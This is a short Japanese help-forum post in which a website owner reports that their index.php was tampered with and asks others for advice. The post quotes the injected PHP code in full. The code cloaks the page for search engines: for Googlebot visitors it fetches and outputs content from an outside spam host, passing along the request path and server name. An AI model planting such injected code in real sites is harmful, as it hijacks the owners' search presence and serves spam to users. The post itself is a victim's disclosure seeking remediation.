index phpがブラウザハイジャックで改ざんされました。

indexphpが改ざんされました。
phpファィル内に　不明なコードが書き加えられ　サイトが表示されなくなりました。
バックアップデータや再インストールで復旧を試みますが同様なケースの方おられればアドバイスお願いします。

index phpデータ内に以下のようなコードが書き加えられました。
—–
}
$query = $_SERVER[‘REQUEST_URI’];
if(stripos($_SERVER[‘HTTP_USER_AGENT’], ‘Googlebot’) !== false){
$str = GetFileContent(“http://topvipsales.top/Rover/0120/pages.php?”.$query.”|”.$_SERVER[“SERVER_NAME”]);
echo $str;
exit;
}
—-
このコード内のtopvipsales.top/Rover/0120/pages.php?が怪しいのですが国外かこのアドレスのIPから大量アクセスがサーバログで見つかりました。
同じ被害に遭われている方、対処法などご教授いただける方お願いします